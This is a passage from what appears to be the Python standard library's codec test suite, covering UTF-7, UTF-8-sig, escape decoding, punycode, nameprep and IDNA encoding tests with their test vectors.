'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e\U00010000',
'a+-b\x00c\x80d\u0100e\U00010000f',
]
)
def test_errors(self):
tests = [
(b'a\xffb', 'a\ufffdb'),
(b'a+IK', 'a\ufffd'),
(b'a+IK-b', 'a\ufffdb'),
(b'a+IK,b', 'a\ufffdb'),
(b'a+IKx', 'a\u20ac\ufffd'),
(b'a+IKx-b', 'a\u20ac\ufffdb'),
(b'a+IKwgr', 'a\u20ac\ufffd'),
(b'a+IKwgr-b', 'a\u20ac\ufffdb'),
(b'a+IKwgr,', 'a\u20ac\ufffd'),
(b'a+IKwgr,-b', 'a\u20ac\ufffd-b'),
(b'a+IKwgrB', 'a\u20ac\u20ac\ufffd'),
(b'a+IKwgrB-b', 'a\u20ac\u20ac\ufffdb'),
(b'a+/,+IKw-b', 'a\ufffd\u20acb'),
(b'a+//,+IKw-b', 'a\ufffd\u20acb'),
(b'a+///,+IKw-b', 'a\uffff\ufffd\u20acb'),
(b'a+////,+IKw-b', 'a\uffff\ufffd\u20acb'),
]
for raw, expected in tests:
with self.subTest(raw=raw):
self.assertRaises(UnicodeDecodeError, codecs.utf_7_decode,
raw, 'strict', True)
self.assertEqual(raw.decode('utf-7', 'replace'), expected)
def test_nonbmp(self):
self.assertEqual('\U000104A0'.encode(self.encoding), b'+2AHcoA-')
self.assertEqual('\ud801\udca0'.encode(self.encoding), b'+2AHcoA-')
self.assertEqual(b'+2AHcoA-'.decode(self.encoding), '\U000104A0')
test_lone_surrogates = None
class UTF16ExTest(unittest.TestCase):
def test_errors(self):
self.assertRaises(UnicodeDecodeError, codecs.utf_16_ex_decode, b"\xff", "strict", 0, True)
def test_bad_args(self):
self.assertRaises(TypeError, codecs.utf_16_ex_decode)
class ReadBufferTest(unittest.TestCase):
def test_array(self):
import array
self.assertEqual(
codecs.readbuffer_encode(array.array("b", b"spam")),
(b"spam", 4)
)
def test_empty(self):
self.assertEqual(codecs.readbuffer_encode(""), (b"", 0))
def test_bad_args(self):
self.assertRaises(TypeError, codecs.readbuffer_encode)
self.assertRaises(TypeError, codecs.readbuffer_encode, 42)
class UTF8SigTest(UTF8Test, unittest.TestCase):
encoding = "utf-8-sig"
def test_partial(self):
self.check_partial(
"\ufeff\x00\xff\u07ff\u0800\uffff\U00010000",
[
"",
"",
"", # First BOM has been read and skipped
"",
"",
"\ufeff", # Second BOM has been read and emitted
"\ufeff\x00", # "\x00" read and emitted
"\ufeff\x00", # First byte of encoded "\xff" read
"\ufeff\x00\xff", # Second byte of encoded "\xff" read
"\ufeff\x00\xff", # First byte of encoded "\u07ff" read
"\ufeff\x00\xff\u07ff", # Second byte of encoded "\u07ff" read
"\ufeff\x00\xff\u07ff",
"\ufeff\x00\xff\u07ff",
"\ufeff\x00\xff\u07ff\u0800",
"\ufeff\x00\xff\u07ff\u0800",
"\ufeff\x00\xff\u07ff\u0800",
"\ufeff\x00\xff\u07ff\u0800\uffff",
"\ufeff\x00\xff\u07ff\u0800\uffff",
"\ufeff\x00\xff\u07ff\u0800\uffff",
"\ufeff\x00\xff\u07ff\u0800\uffff",
"\ufeff\x00\xff\u07ff\u0800\uffff\U00010000",
]
)
def test_bug1601501(self):
# SF bug #1601501: check that the codec works with a buffer
self.assertEqual(str(b"\xef\xbb\xbf", "utf-8-sig"), "")
def test_bom(self):
d = codecs.getincrementaldecoder("utf-8-sig")()
s = "spam"
self.assertEqual(d.decode(s.encode("utf-8-sig")), s)
def test_stream_bom(self):
unistring = "ABC\u00A1\u2200XYZ"
bytestring = codecs.BOM_UTF8 + b"ABC\xC2\xA1\xE2\x88\x80XYZ"
reader = codecs.getreader("utf-8-sig")
for sizehint in [None] + list(range(1, 11)) + \
[64, 128, 256, 512, 1024]:
istream = reader(io.BytesIO(bytestring))
ostream = io.StringIO()
while 1:
if sizehint is not None:
data = istream.read(sizehint)
else:
data = istream.read()
if not data:
break
ostream.write(data)
got = ostream.getvalue()
self.assertEqual(got, unistring)
def test_stream_bare(self):
unistring = "ABC\u00A1\u2200XYZ"
bytestring = b"ABC\xC2\xA1\xE2\x88\x80XYZ"
reader = codecs.getreader("utf-8-sig")
for sizehint in [None] + list(range(1, 11)) + \
[64, 128, 256, 512, 1024]:
istream = reader(io.BytesIO(bytestring))
ostream = io.StringIO()
while 1:
if sizehint is not None:
data = istream.read(sizehint)
else:
data = istream.read()
if not data:
break
ostream.write(data)
got = ostream.getvalue()
self.assertEqual(got, unistring)
class EscapeDecodeTest(unittest.TestCase):
def test_empty(self):
self.assertEqual(codecs.escape_decode(b""), (b"", 0))
def test_raw(self):
decode = codecs.escape_decode
for b in range(256):
b = bytes([b])
if b != b'\\':
self.assertEqual(decode(b + b'0'), (b + b'0', 2))
def test_escape(self):
decode = codecs.escape_decode
check = coding_checker(self, decode)
check(b"[\\\n]", b"[]")
check(br'[\"]', b'["]')
check(br"[\']", b"[']")
check(br"[\\]", br"[\]")
check(br"[\a]", b"[\x07]")
check(br"[\b]", b"[\x08]")
check(br"[\t]", b"[\x09]")
check(br"[\n]", b"[\x0a]")
check(br"[\v]", b"[\x0b]")
check(br"[\f]", b"[\x0c]")
check(br"[\r]", b"[\x0d]")
check(br"[\7]", b"[\x07]")
check(br"[\8]", br"[\8]")
check(br"[\78]", b"[\x078]")
check(br"[\41]", b"[!]")
check(br"[\418]", b"[!8]")
check(br"[\101]", b"[A]")
check(br"[\1010]", b"[A0]")
check(br"[\501]", b"[A]")
check(br"[\x41]", b"[A]")
check(br"[\X41]", br"[\X41]")
check(br"[\x410]", b"[A0]")
for b in range(256):
if b not in b'\n"\'\\abtnvfr01234567x':
b = bytes([b])
check(b'\\' + b, b'\\' + b)
def test_errors(self):
decode = codecs.escape_decode
self.assertRaises(ValueError, decode, br"\x")
self.assertRaises(ValueError, decode, br"[\x]")
self.assertEqual(decode(br"[\x]\x", "ignore"), (b"[]", 6))
self.assertEqual(decode(br"[\x]\x", "replace"), (b"[?]?", 6))
self.assertRaises(ValueError, decode, br"\x0")
self.assertRaises(ValueError, decode, br"[\x0]")
self.assertEqual(decode(br"[\x0]\x0", "ignore"), (b"[]", 8))
self.assertEqual(decode(br"[\x0]\x0", "replace"), (b"[?]?", 8))
class RecodingTest(unittest.TestCase):
def test_recoding(self):
f = io.BytesIO()
f2 = codecs.EncodedFile(f, "unicode_internal", "utf-8")
f2.write("a")
f2.close()
# Python used to crash on this at exit because of a refcount
# bug in _codecsmodule.c
# From RFC 3492
punycode_testcases = [
# A Arabic (Egyptian):
("\u0644\u064A\u0647\u0645\u0627\u0628\u062A\u0643\u0644"
"\u0645\u0648\u0634\u0639\u0631\u0628\u064A\u061F",
b"egbpdaj6bu4bxfgehfvwxn"),
# B Chinese (simplified):
("\u4ED6\u4EEC\u4E3A\u4EC0\u4E48\u4E0D\u8BF4\u4E2D\u6587",
b"ihqwcrb4cv8a8dqg056pqjye"),
# C Chinese (traditional):
("\u4ED6\u5011\u7232\u4EC0\u9EBD\u4E0D\u8AAA\u4E2D\u6587",
b"ihqwctvzc91f659drss3x8bo0yb"),
# D Czech: Pro<ccaron>prost<ecaron>nemluv<iacute><ccaron>esky
("\u0050\u0072\u006F\u010D\u0070\u0072\u006F\u0073\u0074"
"\u011B\u006E\u0065\u006D\u006C\u0075\u0076\u00ED\u010D"
"\u0065\u0073\u006B\u0079",
b"Proprostnemluvesky-uyb24dma41a"),
# E Hebrew:
("\u05DC\u05DE\u05D4\u05D4\u05DD\u05E4\u05E9\u05D5\u05D8"
"\u05DC\u05D0\u05DE\u05D3\u05D1\u05E8\u05D9\u05DD\u05E2"
"\u05D1\u05E8\u05D9\u05EA",
b"4dbcagdahymbxekheh6e0a7fei0b"),
# F Hindi (Devanagari):
("\u092F\u0939\u0932\u094B\u0917\u0939\u093F\u0928\u094D"
"\u0926\u0940\u0915\u094D\u092F\u094B\u0902\u0928\u0939"
"\u0940\u0902\u092C\u094B\u0932\u0938\u0915\u0924\u0947"
"\u0939\u0948\u0902",
b"i1baa7eci9glrd9b2ae1bj0hfcgg6iyaf8o0a1dig0cd"),
#(G) Japanese (kanji and hiragana):
("\u306A\u305C\u307F\u3093\u306A\u65E5\u672C\u8A9E\u3092"
"\u8A71\u3057\u3066\u304F\u308C\u306A\u3044\u306E\u304B",
b"n8jok5ay5dzabd5bym9f0cm5685rrjetr6pdxa"),
# (H) Korean (Hangul syllables):
("\uC138\uACC4\uC758\uBAA8\uB4E0\uC0AC\uB78C\uB4E4\uC774"
"\uD55C\uAD6D\uC5B4\uB97C\uC774\uD574\uD55C\uB2E4\uBA74"
"\uC5BC\uB9C8\uB098\uC88B\uC744\uAE4C",
b"989aomsvi5e83db1d2a355cv1e0vak1dwrv93d5xbh15a0dt30a5j"
b"psd879ccm6fea98c"),
# (I) Russian (Cyrillic):
("\u043F\u043E\u0447\u0435\u043C\u0443\u0436\u0435\u043E"
"\u043D\u0438\u043D\u0435\u0433\u043E\u0432\u043E\u0440"
"\u044F\u0442\u043F\u043E\u0440\u0443\u0441\u0441\u043A"
"\u0438",
b"b1abfaaepdrnnbgefbaDotcwatmq2g4l"),
# (J) Spanish: Porqu<eacute>nopuedensimplementehablarenEspa<ntilde>ol
("\u0050\u006F\u0072\u0071\u0075\u00E9\u006E\u006F\u0070"
"\u0075\u0065\u0064\u0065\u006E\u0073\u0069\u006D\u0070"
"\u006C\u0065\u006D\u0065\u006E\u0074\u0065\u0068\u0061"
"\u0062\u006C\u0061\u0072\u0065\u006E\u0045\u0073\u0070"
"\u0061\u00F1\u006F\u006C",
b"PorqunopuedensimplementehablarenEspaol-fmd56a"),
# (K) Vietnamese:
# T<adotbelow>isaoh<odotbelow>kh<ocirc>ngth<ecirchookabove>ch\
# <ihookabove>n<oacute>iti<ecircacute>ngVi<ecircdotbelow>t
("\u0054\u1EA1\u0069\u0073\u0061\u006F\u0068\u1ECD\u006B"
"\u0068\u00F4\u006E\u0067\u0074\u0068\u1EC3\u0063\u0068"
"\u1EC9\u006E\u00F3\u0069\u0074\u0069\u1EBF\u006E\u0067"
"\u0056\u0069\u1EC7\u0074",
b"TisaohkhngthchnitingVit-kjcr8268qyxafd2f1b9g"),
#(L) 3<nen>B<gumi><kinpachi><sensei>
("\u0033\u5E74\u0042\u7D44\u91D1\u516B\u5148\u751F",
b"3B-ww4c5e180e575a65lsy2b"),
# (M) <amuro><namie>-with-SUPER-MONKEYS
("\u5B89\u5BA4\u5948\u7F8E\u6075\u002D\u0077\u0069\u0074"
"\u0068\u002D\u0053\u0055\u0050\u0045\u0052\u002D\u004D"
"\u004F\u004E\u004B\u0045\u0059\u0053",
b"-with-SUPER-MONKEYS-pc58ag80a8qai00g7n9n"),
# (N) Hello-Another-Way-<sorezore><no><basho>
("\u0048\u0065\u006C\u006C\u006F\u002D\u0041\u006E\u006F"
"\u0074\u0068\u0065\u0072\u002D\u0057\u0061\u0079\u002D"
"\u305D\u308C\u305E\u308C\u306E\u5834\u6240",
b"Hello-Another-Way--fc4qua05auwb3674vfr0b"),
# (O) <hitotsu><yane><no><shita>2
("\u3072\u3068\u3064\u5C4B\u6839\u306E\u4E0B\u0032",
b"2-u9tlzr9756bt3uc0v"),
# (P) Maji<de>Koi<suru>5<byou><mae>
("\u004D\u0061\u006A\u0069\u3067\u004B\u006F\u0069\u3059"
"\u308B\u0035\u79D2\u524D",
b"MajiKoi5-783gue6qz075azm5e"),
# (Q) <pafii>de<runba>
("\u30D1\u30D5\u30A3\u30FC\u0064\u0065\u30EB\u30F3\u30D0",
b"de-jg4avhby1noc0d"),
# (R) <sono><supiido><de>
("\u305D\u306E\u30B9\u30D4\u30FC\u30C9\u3067",
b"d9juau41awczczp"),
# (S) -> $1.00 <-
("\u002D\u003E\u0020\u0024\u0031\u002E\u0030\u0030\u0020"
"\u003C\u002D",
b"-> $1.00 <--")
]
for i in punycode_testcases:
if len(i)!=2:
print(repr(i))
class PunycodeTest(unittest.TestCase):
def test_encode(self):
for uni, puny in punycode_testcases:
# Need to convert both strings to lower case, since
# some of the extended encodings use upper case, but our
# code produces only lower case. Converting just puny to
# lower is also insufficient, since some of the input characters
# are upper case.
self.assertEqual(
str(uni.encode("punycode"), "ascii").lower(),
str(puny, "ascii").lower()
)
def test_decode(self):
for uni, puny in punycode_testcases:
self.assertEqual(uni, puny.decode("punycode"))
puny = puny.decode("ascii").encode("ascii")
self.assertEqual(uni, puny.decode("punycode"))
class UnicodeInternalTest(unittest.TestCase):
@unittest.skipUnless(SIZEOF_WCHAR_T == 4, 'specific to 32-bit wchar_t')
def test_bug1251300(self):
# Decoding with unicode_internal used to not correctly handle "code
# points" above 0x10ffff on UCS-4 builds.
ok = [
(b"\x00\x10\xff\xff", "\U0010ffff"),
(b"\x00\x00\x01\x01", "\U00000101"),
(b"", ""),
]
not_ok = [
b"\x7f\xff\xff\xff",
b"\x80\x00\x00\x00",
b"\x81\x00\x00\x00",
b"\x00",
b"\x00\x00\x00\x00\x00",
]
for internal, uni in ok:
if sys.byteorder == "little":
internal = bytes(reversed(internal))
with support.check_warnings():
self.assertEqual(uni, internal.decode("unicode_internal"))
for internal in not_ok:
if sys.byteorder == "little":
internal = bytes(reversed(internal))
with support.check_warnings(('unicode_internal codec has been '
'deprecated', DeprecationWarning)):
self.assertRaises(UnicodeDecodeError, internal.decode,
"unicode_internal")
if sys.byteorder == "little":
invalid = b"\x00\x00\x11\x00"
else:
invalid = b"\x00\x11\x00\x00"
with support.check_warnings():
self.assertRaises(UnicodeDecodeError,
invalid.decode, "unicode_internal")
with support.check_warnings():
self.assertEqual(invalid.decode("unicode_internal", "replace"),
'\ufffd')
@unittest.skipUnless(SIZEOF_WCHAR_T == 4, 'specific to 32-bit wchar_t')
def test_decode_error_attributes(self):
try:
with support.check_warnings(('unicode_internal codec has been '
'deprecated', DeprecationWarning)):
b"\x00\x00\x00\x00\x00\x11\x11\x00".decode("unicode_internal")
except UnicodeDecodeError as ex:
self.assertEqual("unicode_internal", ex.encoding)
self.assertEqual(b"\x00\x00\x00\x00\x00\x11\x11\x00", ex.object)
self.assertEqual(4, ex.start)
self.assertEqual(8, ex.end)
else:
self.fail()
@unittest.skipUnless(SIZEOF_WCHAR_T == 4, 'specific to 32-bit wchar_t')
def test_decode_callback(self):
codecs.register_error("UnicodeInternalTest", codecs.ignore_errors)
decoder = codecs.getdecoder("unicode_internal")
with support.check_warnings(('unicode_internal codec has been '
'deprecated', DeprecationWarning)):
ab = "ab".encode("unicode_internal").decode()
ignored = decoder(bytes("%s\x22\x22\x22\x22%s" % (ab[:4], ab[4:]),
"ascii"),
"UnicodeInternalTest")
self.assertEqual(("ab", 12), ignored)
def test_encode_length(self):
with support.check_warnings(('unicode_internal codec has been '
'deprecated', DeprecationWarning)):
# Issue 3739
encoder = codecs.getencoder("unicode_internal")
self.assertEqual(encoder("a")[1], 1)
self.assertEqual(encoder("\xe9\u0142")[1], 2)
self.assertEqual(codecs.escape_encode(br'\x00')[1], 4)
# From http://www.gnu.org/software/libidn/draft-josefsson-idn-test-vectors.html
nameprep_tests = [
# 3.1 Map to nothing.
(b'foo\xc2\xad\xcd\x8f\xe1\xa0\x86\xe1\xa0\x8bbar'
b'\xe2\x80\x8b\xe2\x81\xa0baz\xef\xb8\x80\xef\xb8\x88\xef'
b'\xb8\x8f\xef\xbb\xbf',
b'foobarbaz'),
# 3.2 Case folding ASCII U+0043 U+0041 U+0046 U+0045.
(b'CAFE',
b'cafe'),
# 3.3 Case folding 8bit U+00DF (german sharp s).
# The original test case is bogus; it says \xc3\xdf
(b'\xc3\x9f',
b'ss'),
# 3.4 Case folding U+0130 (turkish capital I with dot).
(b'\xc4\xb0',
b'i\xcc\x87'),
# 3.5 Case folding multibyte U+0143 U+037A.
(b'\xc5\x83\xcd\xba',
b'\xc5\x84 \xce\xb9'),
# 3.6 Case folding U+2121 U+33C6 U+1D7BB.
# XXX: skip this as it fails in UCS-2 mode
#('\xe2\x84\xa1\xe3\x8f\x86\xf0\x9d\x9e\xbb',
# 'telc\xe2\x88\x95kg\xcf\x83'),
(None, None),
# 3.7 Normalization of U+006a U+030c U+00A0 U+00AA.
(b'j\xcc\x8c\xc2\xa0\xc2\xaa',
b'\xc7\xb0 a'),
# 3.8 Case folding U+1FB7 and normalization.
(b'\xe1\xbe\xb7',
b'\xe1\xbe\xb6\xce\xb9'),
# 3.9 Self-reverting case folding U+01F0 and normalization.
# The original test case is bogus, it says `\xc7\xf0'
(b'\xc7\xb0',
b'\xc7\xb0'),
# 3.10 Self-reverting case folding U+0390 and normalization.
(b'\xce\x90',
b'\xce\x90'),
# 3.11 Self-reverting case folding U+03B0 and normalization.
(b'\xce\xb0',
b'\xce\xb0'),
# 3.12 Self-reverting case folding U+1E96 and normalization.
(b'\xe1\xba\x96',
b'\xe1\xba\x96'),
# 3.13 Self-reverting case folding U+1F56 and normalization.
(b'\xe1\xbd\x96',
b'\xe1\xbd\x96'),
# 3.14 ASCII space character U+0020.
(b' ',
b' '),
# 3.15 Non-ASCII 8bit space character U+00A0.
(b'\xc2\xa0',
b' '),
# 3.16 Non-ASCII multibyte space character U+1680.
(b'\xe1\x9a\x80',
None),
# 3.17 Non-ASCII multibyte space character U+2000.
(b'\xe2\x80\x80',
b' '),
# 3.18 Zero Width Space U+200b.
(b'\xe2\x80\x8b',
b''),
# 3.19 Non-ASCII multibyte space character U+3000.
(b'\xe3\x80\x80',
b' '),
# 3.20 ASCII control characters U+0010 U+007F.
(b'\x10\x7f',
b'\x10\x7f'),
# 3.21 Non-ASCII 8bit control character U+0085.
(b'\xc2\x85',
None),
# 3.22 Non-ASCII multibyte control character U+180E.
(b'\xe1\xa0\x8e',
None),
# 3.23 Zero Width No-Break Space U+FEFF.
(b'\xef\xbb\xbf',
b''),
# 3.24 Non-ASCII control character U+1D175.
(b'\xf0\x9d\x85\xb5',
None),
# 3.25 Plane 0 private use character U+F123.
(b'\xef\x84\xa3',
None),
# 3.26 Plane 15 private use character U+F1234.
(b'\xf3\xb1\x88\xb4',
None),
# 3.27 Plane 16 private use character U+10F234.
(b'\xf4\x8f\x88\xb4',
None),
# 3.28 Non-character code point U+8FFFE.
(b'\xf2\x8f\xbf\xbe',
None),
# 3.29 Non-character code point U+10FFFF.
(b'\xf4\x8f\xbf\xbf',
None),
# 3.30 Surrogate code U+DF42.
(b'\xed\xbd\x82',
None),
# 3.31 Non-plain text character U+FFFD.
(b'\xef\xbf\xbd',
None),
# 3.32 Ideographic description character U+2FF5.
(b'\xe2\xbf\xb5',
None),
# 3.33 Display property character U+0341.
(b'\xcd\x81',
b'\xcc\x81'),
# 3.34 Left-to-right mark U+200E.
(b'\xe2\x80\x8e',
None),
# 3.35 Deprecated U+202A.
(b'\xe2\x80\xaa',
None),
# 3.36 Language tagging character U+E0001.
(b'\xf3\xa0\x80\x81',
None),
# 3.37 Language tagging character U+E0042.
(b'\xf3\xa0\x81\x82',
None),
# 3.38 Bidi: RandALCat character U+05BE and LCat characters.
(b'foo\xd6\xbebar',
None),
# 3.39 Bidi: RandALCat character U+FD50 and LCat characters.
(b'foo\xef\xb5\x90bar',
None),
# 3.40 Bidi: RandALCat character U+FB38 and LCat characters.
(b'foo\xef\xb9\xb6bar',
b'foo \xd9\x8ebar'),
# 3.41 Bidi: RandALCat without trailing RandALCat U+0627 U+0031.
(b'\xd8\xa71',
None),
# 3.42 Bidi: RandALCat character U+0627 U+0031 U+0628.
(b'\xd8\xa71\xd8\xa8',
b'\xd8\xa71\xd8\xa8'),
# 3.43 Unassigned code point U+E0002.
# Skip this test as we allow unassigned
#(b'\xf3\xa0\x80\x82',
# None),
(None, None),
# 3.44 Larger test (shrinking).
# Original test case reads \xc3\xdf
(b'X\xc2\xad\xc3\x9f\xc4\xb0\xe2\x84\xa1j\xcc\x8c\xc2\xa0\xc2'
b'\xaa\xce\xb0\xe2\x80\x80',
b'xssi\xcc\x87tel\xc7\xb0 a\xce\xb0 '),
# 3.45 Larger test (expanding).
# Original test case reads \xc3\x9f
(b'X\xc3\x9f\xe3\x8c\x96\xc4\xb0\xe2\x84\xa1\xe2\x92\x9f\xe3\x8c'
b'\x80',
b'xss\xe3\x82\xad\xe3\x83\xad\xe3\x83\xa1\xe3\x83\xbc\xe3'
b'\x83\x88\xe3\x83\xabi\xcc\x87tel\x28d\x29\xe3\x82'
b'\xa2\xe3\x83\x91\xe3\x83\xbc\xe3\x83\x88')
]
class NameprepTest(unittest.TestCase):
def test_nameprep(self):
from encodings.idna import nameprep
for pos, (orig, prepped) in enumerate(nameprep_tests):
if orig is None:
# Skipped
continue
# The Unicode strings are given in UTF-8
orig = str(orig, "utf-8", "surrogatepass")
if prepped is None:
# Input contains prohibited characters
self.assertRaises(UnicodeError, nameprep, orig)
else:
prepped = str(prepped, "utf-8", "surrogatepass")
try:
self.assertEqual(nameprep(orig), prepped)
except Exception as e:
raise support.TestFailed("Test 3.%d: %s" % (pos+1, str(e)))
class IDNACodecTest(unittest.TestCase):
def test_builtin_decode(self):
self.assertEqual(str(b"python.org", "idna"), "python.org")
self.assertEqual(str(b"python.org.", "idna"), "python.org.")
self.assertEqual(str(b"xn--pythn-mua.org", "idna"), "pyth\xf6n.org")
self.assertEqual(str(b"xn--pythn-mua.org.", "idna"), "pyth\xf6n.org.")
def test_builtin_encode(self):
self.assertEqual("python.org".encode("idna"), b"python.org")
self.assertEqual("python.org.".encode("idna"), b"python.org.")
self.assertEqual("pyth\xf6n.org".encode("idna"), b"xn--pythn-mua.org")
self.assertEqual("pyth\xf6n.org.".encode("idna"), b"xn--pythn-mua.org.")
def test_stream(self):
r = codecs.getreader("idna")(io.BytesIO(b"abc"))
r.read(3)
self.assertEqual(r.read(), "")
def test_incremental_decode(self):
self.assertEqual(
"".join(codecs.iterdecode((bytes([c]) for c in b"python.org"), "idna")),
"python.org"
)
self.assertEqual(
"".join(codecs.iterdecode((bytes([c]) for c in b"python.org."), "idna")),
"python.org."
)
self.assertEqual(
"".join(codecs.iterdecode((bytes([c]) for c in b"xn--pythn-mua.org."), "idna")),
"pyth\xf6n.org."
)
self.assertEqual(
"".join(codecs.iterdecode((bytes([c]) for c in b"xn--pythn-mua.org."), "idna")),
"pyth\xf6n.org."
)
decoder = codecs.getincrementaldecoder("idna")()
self.assertEqual(decoder.decode(b"xn--xam", ), "")
self.assertEqual(decoder.decode(b"ple-9ta.o", ), "\xe4xample.")
self.assertEqual(decoder.decode(b"rg"), "")
self.assertEqual(decoder.decode(b"", True), "org")
decoder.reset()
self.assertEqual(decoder.decode(b"xn--xam", ), "")
self.assertEqual(decoder.decode(b"ple-9ta.o", ), "\xe4xample.")
self.assertEqual(decoder.decode(b"rg."), "org.")
self.assertEqual(decoder.decode(b"", True), "")
def test_incremental_encode(self):
self.assertEqual(
b"".join(codecs.iterencode("python.org", "idna")),
b"python.org"
)
self.assertEqual(
b"".join(codecs.iterencode("python.org.", "idna")),
b"python.org."
)
self.assertEqual(
b"".join(codecs.iterencode("pyth\xf6n.org.", "idna")),
b"xn--pythn-mua.org."
)
self.assertEqual(
b"".join(codecs.iterencode("pyth\xf6n.org.", "idna")),
b"xn--pythn-mua.org."
)
encoder = codecs.getincrementalencoder("idna")()
self.assertEqual(encoder.encode("\xe4x"), b"")
self.assertEqual(encoder.encode("ample.org"), b"xn--xample-9ta.")
self.assertEqual(encoder.encode("", True), b"org")
encoder.reset()
self.assertEqual(encoder.encode("\xe4x"), b"")
self.assertEqual(encoder.encode("ample.org."), b"xn--xample-9ta.org.")
self.assertEqual(encoder.encode("", True), b"")
class CodecsModuleTest(unittest.TestCase):
def test_decode(self):
self.assertEqual(codecs.decode(b'\xe4\xf6\xfc', 'latin-1'),
'\xe4\xf6\xfc')
self.assertRaises(TypeError, codecs.decode)
self.assertEqual(codecs.decode(b'abc'), 'abc')
self.assertRaises(UnicodeDecodeError, codecs.decode, b'\xff', 'ascii')
def test_encode(self):
self.assertEqual(codecs.encode('\xe4\xf6\xfc', 'latin-1'),
b'\xe4\xf6\xfc')
self.assertRaises(TypeError, codecs.encode)
self.assertRaises(LookupError, codecs.encode, "foo", "__spam__")
self.assertEqual(codecs.encode('abc'), b'abc')
self.assertRaises(UnicodeEncodeError, codecs.encode, '\xffff', 'ascii')
def test_register(self):
self.assertRaises(TypeError, codecs.register)
self.assertRaises(TypeError, codecs.register, 42)
def test_lookup(self):
self.assertRaises(TypeError, codecs.lookup)
self.assertRaises(LookupError, codecs.lookup, "__spam__")
self.assertRaises(LookupError, codecs.lookup, " ")
def test_getencoder(self):
self.assertRaises(TypeError, codecs.getencoder)
self.assertRaises(LookupError, codecs.getencoder, "__spam__")
def test_getdecoder(self):
self.assertRaises(TypeError, codecs.getdecoder)
self.assertRaises(LookupError, codecs.getdecoder, "__spam__")
def test_getreader(self):
self.assertRaises(TypeError, codecs.getreader)
self.assertRaises(LookupError, codecs.getreader, "__spam__")
def test_getwriter(self):
self.assertRaises(TypeError, codecs.getwriter)
self.assertRaises(LookupError, codecs.getwriter, "__spam__")
def test_lookup_issue1813(self):
# Issue #1813: under Turkish locales, lookup of some codecs failed
# because 'I' is lowercased as "ı" (dotless i)
oldlocale = locale.setlocale(locale.LC_CTYPE)
self.addCleanup(locale.setlocale, locale.LC_CTYPE, oldlocale)
try:
locale.setlocale(locale.LC_CTYPE, 'tr_TR')
except locale.Error:
# Unsupported locale on this system
self.skipTest('test needs Turkish locale')
c = codecs.lookup('ASCII')
self.assertEqual(c.name, 'ascii')
class StreamReaderTest(unittest.TestCase):
def setUp(self):
self.reader = codecs.getreader('utf-8')
self.stream = io.BytesIO(b'\xed\x95\x9c\n\xea\xb8\x80')
def test_readlines(self):
f = self.reader(self.stream)
self.assertEqual(f.readlines(), ['\ud55c\n', '\uae00'])
class EncodedFileTest(unittest.TestCase):
def test_basic(self):
f = io.BytesIO(b'\xed\x95\x9c\n\xea\xb8\x80')
ef = codecs.EncodedFile(f, 'utf-16-le', 'utf-8')
self.assertEqual(ef.read(), b'\\\xd5\n\x00\x00\xae')
f = io.BytesIO()
ef = codecs.EncodedFile(f, 'utf-8', 'latin-1')
ef.write(b'\xc3\xbc')
self.assertEqual(f.getvalue(), b'\xfc')
all_unicode_encodings = [
"ascii",
"big5",
"big5hkscs",
"charmap",
"cp037",
"cp1006",
"cp1026",
"cp1125",
"cp1140",
"cp1250",
"cp1251",
"cp1252",
"cp1253",
"cp1254",
"cp1255",
"cp1256",
"cp1257",
"cp1258",
"cp424",
"cp437",
"cp500",
"cp720",
"cp737",
"cp775",
"cp850",
"cp852",
"cp855",
"cp856",
"cp857",
"cp858",
"cp860",
"cp861",
"cp862",
"cp863",
"cp864",
"cp865",
"cp866",
"cp869",
"cp874",
"cp875",
"cp932",
"cp949",
"cp950",
"euc_jis_2004",
"euc_jisx0213",
"euc_jp",
"euc_kr",
"gb18030",
"gb2312",
"gbk",
"hp_roman8",
"hz",
"idna",
"iso2022_jp",
"iso2022_jp_1",
"iso2022_jp_2",
"iso2022_jp_2004",
"iso2022_jp_3",
"iso2022_jp_ext",
"iso2022_kr",
"iso8859_1",
"iso8859_10",
"iso8859_11",
"iso8859_13",
"iso8859_14",
"iso8859_15",
"iso8859_16",
"iso8859_2",
"iso8859_3",
"iso8859_4",
"iso8859_5",
"iso8859_6",
"iso8859_7",
"iso8859_8",
"iso8859_9",
"johab",
"koi8_r",
"koi8_u",
"latin_1",
"mac_cyrillic",
"mac_greek",
"mac_iceland",
"mac_latin2",
"mac_roman",
"mac_turkish",
"palmos",
"ptcp154",
"punycode",
"raw_unicode_escape",
"shift_jis",
"shift_jis_2004",
"shift_jisx0213",
"tis_620",
"unicode_escape",
"unicode_internal",
"utf_16",
"utf_16_be",
"utf_16_le",
"utf_7",
"utf_8",
]
if hasattr(codecs, "mbcs_encode"):
all_unicode_encodings.append("mbcs")
# The following encoding is not tested, because it's not supposed
# to work:
# "undefined"
# The following encodings don't work in stateful mode
broken_unicode_with_streams = [
"punycode",
"unicode_internal"
]
broken_incremental_coders = broken_unicode_with_streams + [
"idna",
]
class BasicUnicodeTest(unittest.TestCase, MixInCheckStateHandling):
def test_basics(self):
s = "abc123" # all codecs should be able to encode these
for encoding in all_unicode_encodings:
name = codecs.lookup(encoding).name
if encoding.endswith("_codec"):
name += "_codec"
elif encoding == "latin_1":
name = "latin_1"
self.assertEqual(encoding.replace("_", "-"), name.replace("_", "-"))
with support.check_warnings():
# unicode-internal has been deprecated
(b, size) = codecs.getencoder(encoding)(s)
self.assertEqual(size, len(s), "encoding=%r" % encoding)
(chars, size) = codecs.getdecoder(encoding)(b)
self.assertEqual(chars, s, "encoding=%r" % encoding)
if encoding not in broken_unicode_with_streams:
# check stream reader/writer
q = Queue(b"")
writer = codecs.getwriter(encoding)(q)
encodedresult = b""
for c in s:
writer.write(c)
chunk = q.read()
self.assertTrue(type(chunk) is bytes, type(chunk))
encodedresult += chunk
q = Queue(b"")
reader = codecs.getreader(encoding)(q)
decodedresult = ""
for c in encodedresult:
q.write(bytes([c]))
decodedresult += reader.read()
self.assertEqual(decodedresult, s, "encoding=%r" % encoding)
if encoding not in broken_incremental_coders:
# check incremental decoder/encoder and iterencode()/iterdecode()
try:
encoder = codecs.getincrementalencoder(encoding)()
except LookupError: # no IncrementalEncoder
pass
else:
# check incremental decoder/encoder
encodedresult = b""
for c in s:
encodedresult += encoder.encode(c)
encodedresult += encoder.encode("", True)
decoder = codecs.getincrementaldecoder(encoding)()
decodedresult = ""
for c in encodedresult:
decodedresult += decoder.decode(bytes([c]))
decodedresult += decoder.decode(b"", True)
